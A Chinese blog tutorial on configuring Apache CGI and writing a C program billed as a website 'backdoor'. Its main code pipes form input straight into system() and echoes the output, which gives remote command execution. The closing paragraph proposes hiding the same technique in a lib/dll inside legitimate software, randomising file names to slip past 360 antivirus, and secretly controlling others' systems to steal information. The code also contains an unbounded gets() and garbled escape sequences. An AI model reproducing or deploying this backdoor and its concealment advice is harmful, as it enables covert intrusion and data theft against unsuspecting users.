c/c++----网站及其后门(CGI应用程序)

C/C++学习到这儿，结合自己曾经学过的javasweb知识，现在让我们来看看，如何做一个CGI程序吧！

首先了解一下啥子叫CGI ：CGI全称是“公共网关接口”(Common Gateway Interface)，HTTP服务器与你的或其它机器上的程序进行“交谈”的一种工具，其程序须运行在网络服务器上。 ----来自百度百科

1. 首先，我们需要 Apache server2.0（学习web，应该必须知道这个的，嘻嘻），安装好该软件之后，也许会出现很多的问题，导致打不开什么的。喵了个咪的，博主本人曾经也是搞了老半天，不过最后，还是搞定了！

（1）. 其实主要情况，我遇到就两种，第一种,就是我们为了节约开机时间，将IIS关闭了，或者有些侠客直接将它卸载了！所以导致打不开！

　　　　　　　　　　-----------------------面对这种问题，下一个就好了！ Apache server2.0 需要 IIS 配合。

(2). 第二种就是80端口被占用了，这是最容易发生的情况没有之一。解决的方法有很多，但是个人比较喜欢这样来搞。

cmd --》 net -ano --->查看那些占用了80端口（一般是浏览器什么的居多）几下他们的 PID ,然后在进程管理哪儿关闭就好了！

上面的Apache server 运行起来之后，就在浏览器中敲入 localhost ，会显示一个

然后修改一个，http.cof文件

找到俩个位置：

第一个位置： # AddHandler cgi-script .cgi 将这个语句的前面#注释符去掉

第二个位置：

<Directory "D:/Program Files/Apache Software Foundation/Apache2.2/cgi-bin"> AllowOverride None Options None -----将这个位置替换为： Options Indexes ExecCGI Order allow,deny Allow from all

</Directory>

这两个位置配置好之后。就可以用C/C++编程了！

第一步：我们编写一个这样的文件

1 #include<stdio.h>
2 int main(int args ,char * argv []) {
3   
4     printf("Content-type:text/htmlnn");
5     printf("hello world ! 我是cgi ");
6     getchar();
7   return 0;
8 }

编译，生成一个这样的 hello.exe文件、生成之后，我们将hell.exe的属性改为 hello.cgi

然后将其放置到，自己安装的Apache server2.0文件中的cgi-bin文件下

在浏览器中，再输入，localhost/cgi-bin/hello.cgi 就可以看到这样的画面

2. 那么说了这么多，我们又该用c/c++写一个cgi来做后台，在背后来操作这个数据呢！

首先，我们需要写一个html，做个web的，对于这些当然，是再easy不过了！为了节约时间，就写一个简陋点的html吧！！

诺，看！

 1 <html>
 2 <head>
 3   <title>后台</title>
 4 </head>
 5 
 6 <body>
 7             <h1> 后台界面</h1>
 8  <form action="http://localhost/cgi-bin/gxjun.cgi" method="post" id=CGI >
 9   
10   请输入命令cmd： <input  type="text"  name="textlist"     /><br><br>  
11   <input  type="submit"    /><br>
12  </form>
13  <hr>
14 <body>
15 </html>

这个界面的运行的效果，如下图：

当然，这个当我们在做web的时候，这个是可以内嵌到，我们的项目中的！在于你将这个jsp放到哪个地儿啦！

最后就是重点了！就像我上面写的cgi一样！写一个下面这样的代码：

 1 #define  _CRT_SECURE_NO_WARNINGS
 2 #include<stdio.h>
 3 #include<stdlib.h>
 4 //#include<stdexcept>
 5 #include<windows.h>
 6 
 7 //以调用System为举例
 8 void func(char ps []) {
 9     // ps 为cmd命令
10     char *pl = strchr(ps,'=');  //pl指向当前的位置
11     if(pl!=NULL)   ps = ps + (pl-ps+1);
12      printf("命令cmd = %sn", ps);
13     char cmd[256] = {''};
14     char  filename[]  = "Gxjun.txt";   //暂定放置于当前目录。
15     sprintf(cmd,"%s > %s ",ps,filename);  //将ps的内容写入cmd中
16     //生成了一条指令
17     //无论是否执行成功，都会生成一个Gxjun.txt文件
18     FILE *fp = NULL;
19     int tag=system(cmd);  
20     if (tag == 1) {
21         printf("命令格式错误！，请重新输入： ");
22         goto loop;
23     }
24     if ((fp = fopen(filename, "r")) == NULL) {
25         printf("没有发现文件！");
26         goto loop ;
27      }
28 
29      while (!feof(fp)) {
30          char str=fgetc(fp);
31           if (str == 'n') printf("<br><br>nn");
32           else if (str == ' ')printf("&nbsp;");
33           else
34               printf("%c",str);
35      }
36 
37  loop:
38      if (fp != NULL){
39          fclose(fp);
40          //并删除备份的文件
41          system("del Gxjun.txt");
42      }
43      return ;
44 }
45 
46 
47 int main(int args ,char * argv []) {
48   
49     printf("Content-type:text/htmlnn");
50     //打印环境变量
51     printf("&nbsp;&nbsp;&nbsp;%s<br><br>", getenv("QUERY_STRING"));
52     char szPost[256] = {''};
53     gets(szPost);  //获取输入    
54     if ( strlen(szPost) < 1 )
55         strcpy( szPost , "ipconfig" );
56     func(szPost);
57     getchar();
58   return 0;
59 }

　　编译之后，形成hello.exe改成将.exe属性改为hello.cgi文件，放置到cgi-bin目录中，当然，如果有服务器，之间放到服务器中就可以看！就像这样

3.打开浏览器，输入类似这样的如下图：

输入一个 tasklist之后，得到这样一个页面显示：

输入： ipconfig 之后得到的画面：

好了！关于，网站后台的知识，大概就这么多了！写的比较操蛋！当然，还可以无限的加精！　这个，得看，你能花多少时间在这个上面了！　做的精华了，你就是一个Ｈａｃｋｅｒ！　　　　

　　当然，其实这个技术，不仅仅仅限于ｗｅｂ这方面，可以适应任何软件，我们可以生成一个lib/dll文件，然后#progma(lib,"**.lib");这样的宏命令，嵌入到我们的软件中，利用这个存在的软件，作为幌子，可以暗暗的操控被人的系统的！当然也可以再写一个dll文件，来执行相应的操作的！这样的话，就需要加入很多的随机元素，比如文件生成不能再是Gxjun,txt，而应该是随机的生成，路径随意的生成，，当然这些都是很容易实现的，这样很容易躲过360的钩子这个流氓软件！然后对别人的软件偷偷的窃取信息什么的！！当然，有３６０把关最底层，你所做的行为不可能逃过它的的监控，唯一的方法就是花钱，让360放行，等等！当然，我们还是可以通过下载者自己放行就可以了（虽然会被拦截）！

－－－－－－－－－－－－－－－－以上都是依据本屌实际操作可行，以及学习得到的经历，分享出来，供大家参考，如果有误，欢迎，严厉带着苛刻的指正！谢谢！－－－－－－－－－－－－－－－－－－